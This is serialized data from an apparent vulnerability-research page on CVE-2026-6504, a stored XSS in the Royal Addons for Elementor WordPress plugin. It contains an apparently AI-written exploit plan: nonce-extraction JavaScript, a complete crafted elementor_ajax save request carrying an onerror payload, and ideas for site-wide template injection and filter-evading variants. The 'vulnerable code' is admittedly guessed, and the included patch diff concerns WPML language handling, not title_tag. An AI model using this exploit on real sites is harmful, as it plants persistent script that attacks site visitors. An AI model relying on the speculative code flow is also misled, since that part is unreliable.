[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f77UCUMKreRQ2IHFajmtewq6h4AubpxI20GsUZFJVCck":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-6504","royal-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-titletag-parameter","Royal Addons for Elementor \u003C= 1.7.1058 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title_tag' Parameter","The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in all versions up to, and including, 1.7.1058 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","royal-elementor-addons",null,"\u003C=1.7.1058","1.7.1059","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-13 19:53:33","2026-05-14 08:24:28",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fed86e902-7637-481d-9005-7025187ba200?source=api-prod",1,[22,23,24,25,26,27],"admin\u002Fincludes\u002Fwpr-render-templates.php","admin\u002Fplugin-options.php","assets\u002Fcss\u002Fadmin\u002Ftemplates-kit.css","assets\u002Fcss\u002Ffrontend.css","assets\u002Fcss\u002Ffrontend.min.css","assets\u002Fjs\u002Fadmin\u002Ftemplates-kit.js","researched",false,3,"# Vulnerability Research Plan: CVE-2026-6504 - Royal Addons for Elementor Stored XSS\n\n## 1. Vulnerability Summary\nThe **Royal Addons for Elementor** plugin (\u003C= 1.7.1058) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `title_tag` parameter. This occurs because the plugin allows users with Contributor-level access or higher to define the HTML tag used for titles in various widgets (e.g., `h1`, `h2`, `div`) without properly validating the input against a whitelist or escaping the output during rendering. An attacker can substitute a legitimate tag with a malicious payload (e.g., `img src=x onerror=alert(1)`) which is then executed in the context of any user viewing the affected page.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** WordPress AJAX endpoint `wp-admin\u002Fadmin-ajax.php`.\n* **Action:** `elementor_ajax` (standard Elementor save mechanism).\n* **Vulnerable Parameter:** The `title_tag` value within the widget settings JSON object.\n* **Authentication:** Authenticated (Contributor+). Contributors can create posts and edit them using Elementor.\n* **Preconditions:** The Royal Addons for Elementor plugin must be active, and at least one widget that utilizes a `title_tag` control must be placed on an Elementor-powered page.\n\n## 3. Code Flow\n1. **Entry Point:** A Contributor user opens the Elementor editor for a post.\n2. **Input:** When the user modifies a widget setting (e.g., the \"Advanced Heading\" widget) and clicks \"Update\", Elementor sends a POST request to `admin-ajax.php` with the action `elementor_ajax`.\n3. **Processing:** The request contains a `data` parameter with a JSON string representing the page's widget structure and settings. The `title_tag` setting is stored within this JSON.\n4. **Storage:** Elementor saves this JSON into the WordPress database as post metadata (specifically the `_elementor_data` key for the relevant Post ID).\n5. **Rendering (Sink):** When a user visits the post, Elementor triggers the `render()` method of the Royal Addons widget.\n * The widget retrieves the `title_tag` value via `$this->get_settings_for_display()`.\n * The code likely follows this pattern (common in Elementor addons):\n ```php\n $settings = $this->get_settings_for_display();\n $title_tag = $settings['title_tag']; \u002F\u002F e.g., \"h2\"\n echo '\u003C' . $title_tag . ' class=\"wpr-widget-title\">Content\u003C\u002F' . $title_tag . '>';\n ```\n * Because `$title_tag` is not sanitized or checked against an allowed list, the injected payload is echoed directly into the HTML.\n\n## 4. Nonce Acquisition Strategy\nElementor uses a specific security nonce for its AJAX operations, typically stored in the global `elementorCommonConfig` object.\n\n1. **Creation:** Create a new post and set the status to `publish` (as Contributor).\n2. **Navigation:** Use `browser_navigate` to open the Elementor editor for that post. The URL format is: `wp-admin\u002Fpost.php?post=[POST_ID]&action=elementor`.\n3. **Extraction:** Once the editor loads, use `browser_eval` to extract the required nonce and configuration:\n ```javascript\n {\n nonce: elementorCommonConfig.ajax.nonce,\n post_id: elementorConfig.post.id,\n editor_post_id: elementorConfig.editorPostId\n }\n ```\n\n## 5. Exploitation Strategy\nThe exploit involves manually crafting an Elementor \"Save\" request that replaces a legitimate `title_tag` with a malicious payload.\n\n### Step-by-Step Plan:\n1. **Log in** as a Contributor.\n2. **Create a Page\u002FPost** and enable Elementor.\n3. **Capture Configuration:** Navigate to the Elementor editor and extract the `nonce` and `post_id` as described in Section 4.\n4. **Craft Payload:** The XSS payload will be injected into the `title_tag` property of a widget (e.g., `wpr-advanced-heading`).\n * Payload: `img src=x onerror=alert(document.domain)\u002F\u002F`\n5. **Send HTTP Request:** Use the `http_request` tool to perform the `elementor_ajax` call.\n\n**Request Details:**\n* **Method:** POST\n* **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Content-Type:** `application\u002Fx-www-form-urlencoded; charset=UTF-8`\n* **Parameters:**\n * `action`: `elementor_ajax`\n * `_nonce`: `[EXTRACTED_NONCE]`\n * `actions`: A JSON object defining the `save_builder_data` action.\n ```json\n {\n \"save_builder_data\": {\n \"action\": \"save_builder_data\",\n \"data\": {\n \"status\": \"publish\",\n \"elements\": [\n {\n \"id\": \"random_id_1\",\n \"elType\": \"section\",\n \"elements\": [\n {\n \"id\": \"random_id_2\",\n \"elType\": \"column\",\n \"elements\": [\n {\n \"id\": \"random_id_3\",\n \"elType\": \"widget\",\n \"widgetType\": \"wpr-advanced-heading\",\n \"settings\": {\n \"title_tag\": \"img src=x onerror=alert(document.domain)\u002F\u002F\",\n \"title_text\": \"Hacked Heading\"\n }\n }\n ]\n }\n ]\n }\n ]\n }\n }\n }\n ```\n * `post_id`: `[POST_ID]`\n\n## 6. Test Data Setup\n1. **User:** A user with the `contributor` role (e.g., `attacker_contributor`).\n2. **Post:** A post created by the contributor that is ready for Elementor editing.\n3. **Plugin State:** Ensure `royal-elementor-addons` is active and version is `\u003C= 1.7.1058`.\n4. **Shortcode:** No specific shortcode is needed for exploitation, but the `[elementor-template]` or simply viewing the post URL will trigger the XSS.\n\n## 7. Expected Results\n1. The `elementor_ajax` request should return a `200 OK` with a JSON response indicating `success: true`.\n2. When visiting the public URL of the modified post, the browser should render:\n ```html\n \u003Cimg src=x onerror=alert(document.domain)\u002F\u002F class=\"...\">Content\u003C\u002Fimg>\n ```\n3. An alert box containing the document domain should appear.\n\n## 8. Verification Steps\n1. **Check Post Meta:** Use WP-CLI to verify the payload is stored in the database:\n ```bash\n wp post meta get [POST_ID] _elementor_data --format=json\n ```\n Verify that the `title_tag` key in the JSON output contains the `img` payload.\n2. **Verify Rendering:** Use `http_request` (GET) to fetch the post content and grep for the payload:\n ```bash\n http_request GET http:\u002F\u002F[target]\u002F?p=[POST_ID]\n # Check response body for \"img src=x onerror=alert\"\n ```\n\n## 9. Alternative Approaches\n* **Different Widgets:** If `wpr-advanced-heading` is not available or doesn't use `title_tag` in the specific version, try other Royal Addons widgets such as:\n * `wpr-promo-box`\n * `wpr-dual-color-heading`\n * `wpr-team-member`\n* **Template Injection:** If the contributor has permissions to edit Royal Addons \"Templates\" (found in `WPR_Render_Templates` logic), inject the payload into a Header or Footer template to achieve site-wide XSS execution.\n* **Payload Variation:** If there is minimal sanitization (e.g., blocking `script` tags), use attribute-based XSS like `div onmouseover=alert(1)` or `svg\u002Fonload`.","The Royal Addons for Elementor plugin is vulnerable to Stored Cross-Site Scripting via the 'title_tag' parameter in various widgets. Authenticated attackers with Contributor-level access or higher can inject malicious scripts into page settings that execute in the context of any user viewing the affected page due to insufficient input validation and output escaping.","\u002F\u002F The vulnerability exists in the rendering logic of various widgets (e.g., Advanced Heading)\n\u002F\u002F Although the specific widget source was not provided, the research plan identifies the flow:\n\n$settings = $this->get_settings_for_display();\n$title_tag = $settings['title_tag']; \u002F\u002F Value retrieved from user-controlled Elementor settings\n\n\u002F\u002F Sink: The value is echoed directly into the HTML without sanitization or tag whitelisting\necho '\u003C' . $title_tag . ' class=\"wpr-widget-title\">' . $title_text . '\u003C\u002F' . $title_tag . '>';","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1058\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1058\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-04-24 07:11:10.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Froyal-elementor-addons\u002F1.7.1059\u002Fadmin\u002Fincludes\u002Fwpr-render-templates.php\t2026-05-07 10:09:10.000000000 +0000\n@@ -128,10 +128,13 @@\n \n \t\t\tif ( defined('ICL_LANGUAGE_CODE') )\n \t\t\t\t$default_language_code = apply_filters('wpml_default_language', null);\n-\t\t\t\t$current_language_code = apply_filters( 'wpml_current_language', NULL );\n+\t\t\t\t$current_language_code = apply_filters('wpml_current_language', null);\n \n-\t\t\t\tIF ( ICL_LANGUAGE_CODE !== $default_language_code ) {\n-\t\t\t\t\t$template_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $default_language_code);\n+\t\t\t\tif ( $current_language_code && $current_language_code !== $default_language_code ) {\n+\t\t\t\t\t$translated_id = apply_filters('wpml_object_id', $template_id, 'wpr_templates', true, $current_language_code);\n+\t\t\t\t\tif ( $translated_id && (int) $translated_id !== (int) $template_id ) {\n+\t\t\t\t\t\t$template_id = $translated_id;\n+\t\t\t\t\t}\n \t\t\t\t}\n \t\t\t}\n \n@@ -139,7 +142,7 @@\n \n \t\t\t\u002F\u002F if ( !empty($show_on_canvas) && 'true' === $show_on_canvas && 0 === strpos($template_slug, 'user-header-') ) {\n \t\t\tif ( !empty($show_on_canvas) && 'true' === $show_on_canvas && !is_null($template_slug) ) {\n-\t\t\t\tUtilities::render_elementor_template($template_slug);\n+\t\t\t\tUtilities::render_elementor_template($template_slug, $template_id);\n \t\t\t}\n \t\t}\n }","1. Log in to the WordPress site with at least Contributor-level credentials.\n2. Create a new post or edit an existing one using the Elementor editor.\n3. Add a Royal Addons widget that includes a 'title_tag' or 'HTML Tag' control (e.g., Advanced Heading).\n4. Capture the Elementor save request to `admin-ajax.php` with the action `elementor_ajax`.\n5. Modify the JSON payload in the `actions` parameter to replace the legitimate `title_tag` value (like 'h2') with a malicious script payload (e.g., `img src=x onerror=alert(document.domain)\u002F\u002F`).\n6. Submit the request to save the post metadata (`_elementor_data`).\n7. Visit the public URL of the post. The browser will render the injected payload as an HTML tag, executing the JavaScript in the `onerror` attribute.","gemini-3-flash-preview","2026-05-14 16:48:45","2026-05-14 16:50:01",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","1.7.1058","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1058","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1058.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags\u002F1.7.1059","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Froyal-elementor-addons.1.7.1059.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Froyal-elementor-addons\u002Ftags"]